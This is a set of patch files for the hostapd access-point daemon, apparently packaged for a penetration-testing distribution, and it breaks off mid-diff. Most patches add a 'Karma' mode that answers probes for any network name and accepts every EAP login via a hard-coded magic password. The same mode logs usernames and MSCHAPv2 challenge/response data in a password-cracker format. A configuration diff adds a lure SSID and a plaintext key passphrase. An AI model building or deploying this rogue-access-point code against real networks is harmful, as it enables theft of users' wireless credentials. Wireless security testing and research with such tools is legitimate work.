diff -urN hostapd-1.0.orig//src/ap/ieee802_11.c hostapd-1.0/src/ap/ieee802_11.c
--- hostapd-1.0.orig//src/ap/ieee802_11.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_11.c 2012-07-17 18:36:53.324958995 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -520,8 +522,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-1.0.orig//src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig//src/eap_server/eap_server.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2012-07-17 18:36:53.325959001 +0800
@@ -18,6 +18,11 @@
* backend_auth configuration variable to TRUE.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -99,24 +104,51 @@
int eap_user_get(struct eap_sm *sm, const u8 *identity, size_t identity_len,
int phase2)
{
- struct eap_user *user;
+ struct eap_user *user;
+ char *username = NULL;
+ char *message = NULL;
+
+ eap_user_free(sm->user);
+ sm->user = NULL;
- if (sm == NULL || sm->eapol_cb == NULL ||
+ user = os_zalloc(sizeof(*user));
+ if (user == NULL)
+ return -1;
+
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ if (karma_eap_auth)
+ {
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else
+ {
+ if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ return -1;
- eap_user_free(sm->user);
- sm->user = NULL;
-
- user = os_zalloc(sizeof(*user));
- if (user == NULL)
- return -1;
-
- if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
- identity_len, phase2, user) != 0) {
- eap_user_free(user);
- return -1;
- }
+ if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ identity_len, phase2, user) != 0) {
+ eap_user_free(user);
+ return -1;
+ }
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-1.0.orig//src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig//src/eap_server/eap_server_mschapv2.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-07-17 18:36:53.331959001 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -290,13 +292,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -336,6 +340,38 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth)
+ {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-1.0.orig//src/karma/karma.c hostapd-1.0/src/karma/karma.c
--- hostapd-1.0.orig//src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-1.0/src/karma/karma.c 2012-07-17 18:36:53.332959000 +0800
@@ -0,0 +1,43 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s: %s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s: %s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-1.0.orig//src/karma/karma.h hostapd-1.0/src/karma/karma.h
--- hostapd-1.0.orig//src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-1.0/src/karma/karma.h 2012-07-17 18:36:53.332959000 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);
diff -urN hostapd-1.0.orig//src/utils/wpa_debug.c hostapd-1.0/src/utils/wpa_debug.c
--- hostapd-1.0.orig//src/utils/wpa_debug.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/utils/wpa_debug.c 2012-07-17 18:36:53.333959000 +0800
@@ -22,6 +22,8 @@
static int wpa_debug_syslog = 0;
#endif /* CONFIG_DEBUG_SYSLOG */
+/* Karma Mode */
+#include "karma/karma.h"
int wpa_debug_level = MSG_INFO;
int wpa_debug_show_keys = 0;


@ -1,449 +0,0 @@
diff -rubN hostapd-1.0/hostapd/hostapd.conf hostapd-1.0-jmk/hostapd/hostapd.conf
--- hostapd-1.0/hostapd/hostapd.conf 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/hostapd.conf 2012-08-09 16:22:15.896176672 -0500
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -83,12 +84,12 @@
##### IEEE 802.11 related configuration #######################################
# SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=YouReallyWantToConnect
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -99,13 +100,13 @@
# Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
# Default: IEEE 802.11b
-hw_mode=g
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers do not use this value from hostapd and the
# channel will need to be configured separately with iwconfig.
-channel=1
+channel=6
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -413,7 +414,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -421,7 +422,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -463,26 +464,26 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/gd-bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
-#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
-#private_key_passwd=secret passphrase
+private_key_passwd=TopSecretFoofusPassword
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -679,7 +680,7 @@
# and/or WPA2 (full IEEE 802.11i/RSN):
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -700,7 +701,7 @@
# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
-#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -rubN hostapd-1.0/hostapd/main.c hostapd-1.0-jmk/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/main.c 2012-08-09 16:12:23.722163161 -0500
@@ -39,6 +39,10 @@
extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -521,7 +525,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -535,7 +539,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes\n"
+ " -A [karma] log all authentication attempts\n");
exit(1);
}
@@ -564,7 +570,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tv");
+ c = getopt(argc, argv, "Bde:f:hKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -599,7 +605,12 @@
show_version();
exit(1);
break;
-
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
default:
usage();
break;
diff -rubN hostapd-1.0/hostapd/Makefile hostapd-1.0-jmk/hostapd/Makefile
--- hostapd-1.0/hostapd/Makefile 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/Makefile 2012-08-09 16:12:23.722163161 -0500
@@ -95,6 +95,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -rubN hostapd-1.0/src/ap/beacon.c hostapd-1.0-jmk/src/ap/beacon.c
--- hostapd-1.0/src/ap/beacon.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/beacon.c 2012-08-09 16:12:23.724163161 -0500
@@ -34,6 +34,7 @@
#include "ap_drv_ops.h"
#include "beacon.h"
+#include "karma/karma.h"
#ifdef NEED_AP_MLME
@@ -283,6 +284,22 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
diff -rubN hostapd-1.0/src/ap/hostapd.c hostapd-1.0-jmk/src/ap/hostapd.c
--- hostapd-1.0/src/ap/hostapd.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/hostapd.c 2012-08-09 16:12:23.725163160 -0500
@@ -37,6 +37,7 @@
#include "ap_config.h"
#include "p2p_hostapd.h"
+#include "karma/karma.h"
static int hostapd_flush_old_stations(struct hostapd_data *hapd, u16 reason);
static int hostapd_setup_encryption(char *iface, struct hostapd_data *hapd);
diff -rubN hostapd-1.0/src/ap/ieee802_11.c hostapd-1.0-jmk/src/ap/ieee802_11.c
--- hostapd-1.0/src/ap/ieee802_11.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/ieee802_11.c 2012-08-09 16:12:23.727163160 -0500
@@ -42,6 +42,7 @@
#include "ap_drv_ops.h"
#include "ieee802_11.h"
+#include "karma/karma.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -520,8 +521,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -rubN hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-jmk/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/eap_server/eap_server.c 2012-08-09 16:17:04.200169582 -0500
@@ -25,6 +25,8 @@
#include "state_machine.h"
#include "common/wpa_ctrl.h"
+#include "karma/karma.h"
+
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
@@ -100,10 +102,8 @@
int phase2)
{
struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ char *username = NULL;
+ char *message = NULL;
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,11 +112,39 @@
if (user == NULL)
return -1;
+ /* Karma EAP Modifications */
+ if (karma_eap_auth) {
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+ //wpa_printf(MSG_ERROR, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod);
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
return -1;
}
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -rubN hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c 2012-08-09 16:12:23.732163160 -0500
@@ -19,6 +19,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "karma/karma.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -290,13 +291,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -336,6 +339,37 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth) {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -rubN hostapd-1.0/src/karma/karma.c hostapd-1.0-jmk/src/karma/karma.c
--- hostapd-1.0/src/karma/karma.c 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.c 2012-08-09 16:12:23.732163160 -0500
@@ -0,0 +1,44 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -rubN hostapd-1.0/src/karma/karma.d hostapd-1.0-jmk/src/karma/karma.d
--- hostapd-1.0/src/karma/karma.d 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.d 2012-08-09 16:24:57.196180351 -0500
@@ -0,0 +1,4 @@
+../src/karma/karma.o: ../src/karma/karma.c ../src/utils/common.h \
+ ../src/utils/os.h ../src/utils/wpa_debug.h ../src/utils/wpabuf.h \
+ ../src/utils/includes.h ../src/utils/build_config.h ../src/utils/trace.h \
+ ../src/karma/karma.h
diff -rubN hostapd-1.0/src/karma/karma.h hostapd-1.0-jmk/src/karma/karma.h
--- hostapd-1.0/src/karma/karma.h 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.h 2012-08-09 16:12:23.733163160 -0500
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);


@ -1,24 +0,0 @@
diff -aurp a/src/drivers/drivers.mak b/src/drivers/drivers.mak
--- a/src/drivers/drivers.mak 2012-10-03 19:42:16.387634128 +0000
+++ b/src/drivers/drivers.mak 2012-10-03 19:43:16.246693744 +0000
@@ -48,7 +48,7 @@ NEED_RFKILL=y
ifdef CONFIG_LIBNL32
DRV_LIBS += -lnl-3
DRV_LIBS += -lnl-genl-3
- DRV_CFLAGS += -DCONFIG_LIBNL20
+ DRV_CFLAGS += -DCONFIG_LIBNL20 -I/usr/include/libnl3
else
ifdef CONFIG_LIBNL_TINY
DRV_LIBS += -lnl-tiny
diff -aurp a/src/drivers/drivers.mk b/src/drivers/drivers.mk
--- a/src/drivers/drivers.mk 2012-10-03 19:42:16.385634126 +0000
+++ b/src/drivers/drivers.mk 2012-10-03 19:43:23.333700780 +0000
@@ -48,7 +48,7 @@ NEED_RFKILL=y
ifdef CONFIG_LIBNL32
DRV_LIBS += -lnl-3
DRV_LIBS += -lnl-genl-3
- DRV_CFLAGS += -DCONFIG_LIBNL20
+ DRV_CFLAGS += -DCONFIG_LIBNL20 -I/usr/include/libnl3
else
ifdef CONFIG_LIBNL_TINY
DRV_LIBS += -lnl-tiny


@ -1,48 +0,0 @@
From 586c446e0ff42ae00315b014924ec669023bd8de Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 7 Oct 2012 20:06:29 +0300
Subject: [PATCH] EAP-TLS server: Fix TLS Message Length validation
EAP-TLS/PEAP/TTLS/FAST server implementation did not validate TLS
Message Length value properly and could end up trying to store more
information into the message buffer than the allocated size if the first
fragment is longer than the indicated size. This could result in hostapd
process terminating in wpabuf length validation. Fix this by rejecting
messages that have invalid TLS Message Length value.
This would affect cases that use the internal EAP authentication server
in hostapd either directly with IEEE 802.1X or when using hostapd as a
RADIUS authentication server and when receiving an incorrectly
constructed EAP-TLS message. Cases where hostapd uses an external
authentication are not affected.
Thanks to Timo Warns for finding and reporting this issue.
Signed-hostap: Jouni Malinen <j@w1.fi>
intended-for: hostap-1
---
src/eap_server/eap_server_tls_common.c | 8 ++++++++
1 files changed, 8 insertions(+), 0 deletions(-)
diff --git a/src/eap_server/eap_server_tls_common.c b/src/eap_server/eap_server_tls_common.c
index 31be2ec..46f282b 100644
--- a/src/eap_server/eap_server_tls_common.c
+++ b/src/eap_server/eap_server_tls_common.c
@@ -228,6 +228,14 @@ static int eap_server_tls_process_fragment(struct eap_ssl_data *data,
return -1;
}
+ if (len > message_length) {
+ wpa_printf(MSG_INFO, "SSL: Too much data (%d bytes) in "
+ "first fragment of frame (TLS Message "
+ "Length %d bytes)",
+ (int) len, (int) message_length);
+ return -1;
+ }
+
data->tls_in = wpabuf_alloc(message_length);
if (data->tls_in == NULL) {
wpa_printf(MSG_DEBUG, "SSL: No memory for message");
--
1.7.4-rc1


@ -1,157 +0,0 @@
diff -urN hostapd-1.0.orig/hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig/hostapd/main.c 2013-05-01 22:58:03.007738503 +0800
+++ hostapd-1.0/hostapd/main.c 2013-05-01 22:49:55.000000000 +0800
@@ -512,7 +512,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.c hostapd-1.0/src/crypto/ms_funcs.c
--- hostapd-1.0.orig/src/crypto/ms_funcs.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.c 2013-05-01 22:49:55.000000000 +0800
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.h hostapd-1.0/src/crypto/ms_funcs.h
--- hostapd-1.0.orig/src/crypto/ms_funcs.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.h 2013-05-01 22:49:55.000000000 +0800
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -urN hostapd-1.0.orig/src/crypto/tls_openssl.c hostapd-1.0/src/crypto/tls_openssl.c
